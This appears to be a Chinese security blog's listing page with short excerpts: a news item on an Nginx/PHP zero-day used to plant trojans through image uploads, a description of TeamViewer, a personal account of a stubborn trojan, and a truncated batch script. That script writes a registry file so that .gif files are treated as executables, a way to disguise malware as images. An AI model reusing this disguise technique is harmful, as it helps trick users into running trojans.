5月21日,瑞星公司向各大网站、企业网络管理员发布安全警告:流行代理器软件Nginx爆出0day漏洞,如果网站使用Nginx和PHP构建,并且允许用户上传图片,就会被黑客入侵,植入木马等。目前,国内多家大型门户网站、购物网站采用了该软件,存在易被攻击的漏洞,截至发稿时已有某大型购物网站等被成功入侵。
据介绍,Nginx是一个高性能的 HTTP 和 反向代理服务器软件,被广泛用于大型博客、购物、相册等网站的服务器中,国内排行前列的大型网站使用的服务器,多数安装了该软件。此漏洞为独立研究团队80sec昨日下午公开的,目前Nginx的开发者至今尚未发布相应补丁。
...- 添加新评论
- 阅读次数:
Teamviewer是一款远程控制软件,“是一个能穿透内网的远程控制软件,是可以在任何防火墙和NAT代理的后台用于远程控制、桌面共享和文件传输的简单且快速的解决方案。”,因其直接支持内网与内网的连接而著名。
Teamviewer官方版是没有任何木马的特征性质的,客户端大小为1.38M(根据版本的不同也会不一样)。官方正式版在每次连接时会弹出一个提示信息,提示有人连接电脑,根据设置还会弹出提示并询问是否接受连接,客户端也可随时结束会话。
...
- 添加新评论
- 阅读次数:
任意文件当做木马来运行
更改exe为gif:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
...
- 添加新评论
- 阅读次数:
遭遇病毒:
笔者刚刚从百度上搜了一些教案资料,不料打开邮箱准备收发邮件时,意外却发生了,奇虎360安全卫士开始报警显示,提示有一个木马程序,弹出的窗口如图一所示,笔者看了一下弹出的提示窗口,没有多想便按下了“终止并删除木马”的按钮,按照惯例,很多木马程序用杀毒软件也是一个命令就可以搞定了,这次提示窗口中又恰好有此删除按钮,笔者想这次也不应该例外。可是按下删除按钮删除以后,接下来,当笔者试图在电脑上打开网页或者是打开某一文件的时候,同样的提示窗口依然又出现了,要不干脆,从病毒提示的路径中去删除,试了一下,可是同样也删除不了,不仅如此,病毒文件个数还在逐渐增加,笔者感觉不妙,看来这个病毒来者不善哦!
- 添加新评论
- 阅读次数: